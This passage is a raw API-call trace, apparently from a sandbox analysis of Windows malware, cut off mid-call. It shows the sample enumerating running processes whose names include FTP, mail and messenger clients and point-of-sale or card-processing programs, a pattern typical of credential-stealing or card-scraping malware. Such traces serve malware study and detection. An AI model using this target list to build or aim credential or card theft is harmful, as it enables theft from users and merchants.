EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.830] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x960000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="weapon.exe") returned 0xa [0063.830] CloseHandle (hObject=0x5c0) returned 1 [0063.830] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x684) returned 0x5c0 [0063.830] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.832] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x850000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="culture.exe") returned 0xb [0063.832] CloseHandle (hObject=0x5c0) returned 1 [0063.832] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2a8) returned 0x5c0 [0063.832] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.833] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x190000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="h produces routers.exe") returned 0x16 [0063.834] CloseHandle (hObject=0x5c0) returned 1 [0063.834] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x290) returned 0x5c0 [0063.834] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.835] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1000000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="hacameras.exe") returned 0xd [0063.836] CloseHandle (hObject=0x5c0) returned 1 [0063.836] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x700) returned 0x5c0 [0063.836] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.837] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x8b0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="fraud.exe") returned 0x9 [0063.838] CloseHandle (hObject=0x5c0) returned 1 [0063.838] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x34c) returned 0x5c0 [0063.838] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.840] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf30000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="chinaassumedtalent.exe") returned 0x16 [0063.840] CloseHandle (hObject=0x5c0) returned 1 [0063.840] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x6d4) returned 0x5c0 [0063.840] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.842] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd70000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="assessed.exe") returned 0xc [0063.842] CloseHandle (hObject=0x5c0) returned 1 [0063.842] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xc0) returned 0x5c0 [0063.842] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.844] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1250000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="thanksgiving.exe") returned 0x10 [0063.844] CloseHandle (hObject=0x5c0) returned 1 [0063.844] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x320) returned 0x5c0 [0063.844] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.846] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x220000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="madagascar_fault_blades.exe") returned 0x1b [0063.846] CloseHandle (hObject=0x5c0) returned 1 [0063.846] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x698) returned 0x5c0 [0063.846] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.848] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x350000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="manufacturing pharmacology forge.exe") returned 0x24 [0063.848] CloseHandle (hObject=0x5c0) returned 1 [0063.848] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x810) returned 0x5c0 [0063.848] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.850] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe00000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="boards.exe") returned 0xa [0063.850] CloseHandle (hObject=0x5c0) returned 1 [0063.850] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x820) returned 0x5c0 [0063.850] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.852] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x60000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="lack-shadow.exe") returned 0xf [0063.852] CloseHandle (hObject=0x5c0) returned 1 [0063.852] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x830) returned 0x5c0 [0063.852] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.854] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x910000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="flood_suspension.exe") returned 0x14 [0063.854] CloseHandle (hObject=0x5c0) returned 1 [0063.854] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x840) returned 0x5c0 [0063.854] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.856] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10a0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="henderson.exe") returned 0xd [0063.856] CloseHandle (hObject=0x5c0) returned 1 [0063.857] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x850) returned 0x5c0 [0063.857] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.858] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="switzerland.exe") returned 0xf [0063.859] CloseHandle (hObject=0x5c0) returned 1 [0063.859] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x860) returned 0x5c0 [0063.859] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.860] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="advertisers_palmer.exe") returned 0x16 [0063.861] CloseHandle (hObject=0x5c0) returned 1 [0063.861] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x870) returned 0x5c0 [0063.861] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.862] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10f0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="itself-profit.exe") returned 0x11 [0063.863] CloseHandle (hObject=0x5c0) returned 1 [0063.863] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8a8) returned 0x5c0 [0063.863] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.864] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x930000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="3dftp.exe") returned 0x9 [0063.865] CloseHandle (hObject=0x5c0) returned 1 [0063.865] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8bc) returned 0x5c0 [0063.865] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.866] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe90000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="absolutetelnet.exe") returned 0x12 [0063.867] CloseHandle (hObject=0x5c0) returned 1 [0063.867] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8cc) returned 0x5c0 [0063.867] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.868] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xcc0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="alftp.exe") returned 0x9 [0063.868] CloseHandle (hObject=0x5c0) returned 1 [0063.869] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8dc) returned 0x5c0 [0063.869] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.870] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x80000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="barca.exe") returned 0x9 [0063.870] CloseHandle (hObject=0x5c0) returned 1 [0063.870] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8ec) returned 0x5c0 [0063.870] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.872] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11c0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="bitkinex.exe") returned 0xc [0063.872] CloseHandle (hObject=0x5c0) returned 1 [0063.872] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x8fc) returned 0x5c0 [0063.872] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.874] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="coreftp.exe") returned 0xb [0063.874] CloseHandle (hObject=0x5c0) returned 1 [0063.874] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x90c) returned 0x5c0 [0063.874] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.875] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x150000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="far.exe") returned 0x7 [0063.876] CloseHandle (hObject=0x5c0) returned 1 [0063.876] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x91c) returned 0x5c0 [0063.876] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.877] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa00000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="filezilla.exe") returned 0xd [0063.878] CloseHandle (hObject=0x5c0) returned 1 [0063.878] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x92c) returned 0x5c0 [0063.878] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.879] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10d0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="flashfxp.exe") returned 0xc [0063.880] CloseHandle (hObject=0x5c0) returned 1 [0063.880] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x93c) returned 0x5c0 [0063.880] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.881] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9a0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="fling.exe") returned 0x9 [0063.882] CloseHandle (hObject=0x5c0) returned 1 [0063.882] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x94c) returned 0x5c0 [0063.882] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.883] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x9f0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="foxmailincmail.exe") returned 0x12 [0063.884] CloseHandle (hObject=0x5c0) returned 1 [0063.884] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x95c) returned 0x5c0 [0063.884] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.885] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xbe0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="gmailnotifierpro.exe") returned 0x14 [0063.886] CloseHandle (hObject=0x5c0) returned 1 [0063.886] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x96c) returned 0x5c0 [0063.886] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.887] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x390000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="icq.exe") returned 0x7 [0063.888] CloseHandle (hObject=0x5c0) returned 1 [0063.888] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x97c) returned 0x5c0 [0063.888] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.890] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x840000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="leechftp.exe") returned 0xc [0063.890] CloseHandle (hObject=0x5c0) returned 1 [0063.890] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x98c) returned 0x5c0 [0063.890] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.892] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe20000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="ncftp.exe") returned 0x9 [0063.892] CloseHandle (hObject=0x5c0) returned 1 [0063.892] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x99c) returned 0x5c0 [0063.892] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.894] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11c0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="notepad.exe") returned 0xb [0063.894] CloseHandle (hObject=0x5c0) returned 1 [0063.894] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ac) returned 0x5c0 [0063.894] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.896] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xd50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="operamail.exe") returned 0xd [0063.896] CloseHandle (hObject=0x5c0) returned 1 [0063.896] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9bc) returned 0x5c0 [0063.896] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.898] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xbb0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="outlook.exe") returned 0xb [0063.898] CloseHandle (hObject=0x5c0) returned 1 [0063.898] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9cc) returned 0x5c0 [0063.898] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.900] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x130000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="pidgin.exe") returned 0xa [0063.900] CloseHandle (hObject=0x5c0) returned 1 [0063.900] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9dc) returned 0x5c0 [0063.900] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.902] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x40000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="scriptftp.exe") returned 0xd [0063.902] CloseHandle (hObject=0x5c0) returned 1 [0063.902] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9ec) returned 0x5c0 [0063.902] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.904] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xee0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="skype.exe") returned 0x9 [0063.904] CloseHandle (hObject=0x5c0) returned 1 [0063.904] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x9fc) returned 0x5c0 [0063.904] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.906] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10f0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="smartftp.exe") returned 0xc [0063.906] CloseHandle (hObject=0x5c0) returned 1 [0063.906] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa0c) returned 0x5c0 [0063.906] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.908] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xdc0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="thunderbird.exe") returned 0xf [0063.908] CloseHandle (hObject=0x5c0) returned 1 [0063.908] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa1c) returned 0x5c0 [0063.908] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.910] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1320000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="totalcmd.exe") returned 0xc [0063.910] CloseHandle (hObject=0x5c0) returned 1 [0063.910] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa2c) returned 0x5c0 [0063.910] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.911] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf20000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="trillian.exe") returned 0xc [0063.912] CloseHandle (hObject=0x5c0) returned 1 [0063.912] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa3c) returned 0x5c0 [0063.912] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.913] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xe50000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="webdrive.exe") returned 0xc [0063.914] CloseHandle (hObject=0x5c0) returned 1 [0063.914] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa4c) returned 0x5c0 [0063.914] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.915] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xa80000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="whatsapp.exe") returned 0xc [0063.915] CloseHandle (hObject=0x5c0) returned 1 [0063.915] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa5c) returned 0x5c0 [0063.915] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.917] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x11a0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="winscp.exe") returned 0xa [0063.917] CloseHandle (hObject=0x5c0) returned 1 [0063.917] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa6c) returned 0x5c0 [0063.917] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.919] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1250000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="yahoomessenger.exe") returned 0x12 [0063.919] CloseHandle (hObject=0x5c0) returned 1 [0063.919] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa7c) returned 0x5c0 [0063.919] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.921] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xc80000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="active-charge.exe") returned 0x11 [0063.921] CloseHandle (hObject=0x5c0) returned 1 [0063.921] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa8c) returned 0x5c0 [0063.921] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.923] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1090000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="accupos.exe") returned 0xb [0063.923] CloseHandle (hObject=0x5c0) returned 1 [0063.923] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa9c) returned 0x5c0 [0063.923] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.925] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x1340000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="afr38.exe") returned 0x9 [0063.925] CloseHandle (hObject=0x5c0) returned 1 [0063.925] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaac) returned 0x5c0 [0063.925] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.927] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xdd0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="aldelo.exe") returned 0xa [0063.927] CloseHandle (hObject=0x5c0) returned 1 [0063.927] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xabc) returned 0x5c0 [0063.928] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.929] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x350000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="ccv_server.exe") returned 0xe [0063.929] CloseHandle (hObject=0x5c0) returned 1 [0063.930] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xacc) returned 0x5c0 [0063.930] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.931] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x10d0000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="centralcreditcard.exe") returned 0x15 [0063.932] CloseHandle (hObject=0x5c0) returned 1 [0063.932] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xadc) returned 0x5c0 [0063.932] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.934] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x150000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="creditservice.exe") returned 0x11 [0063.934] CloseHandle (hObject=0x5c0) returned 1 [0063.934] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaec) returned 0x5c0 [0063.935] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.936] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xb90000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="edcsvr.exe") returned 0xa [0063.937] CloseHandle (hObject=0x5c0) returned 1 [0063.937] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xafc) returned 0x5c0 [0063.937] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.938] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0xf30000, lpBaseName=0x18d770, nSize=0x400 | out: lpBaseName="fpos.exe") returned 0x8 [0063.939] CloseHandle (hObject=0x5c0) returned 1 [0063.939] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xb0c) returned 0x5c0 [0063.939] EnumProcessModules (in: hProcess=0x5c0, lphModule=0x18df8c, cb=0x4, lpcbNeeded=0x18df70 | out: lphModule=0x18df8c, lpcbNeeded=0x18df70) returned 1 [0063.940] GetModuleBaseNameW (in: hProcess=0x5c0, hModule=0x2a0000, 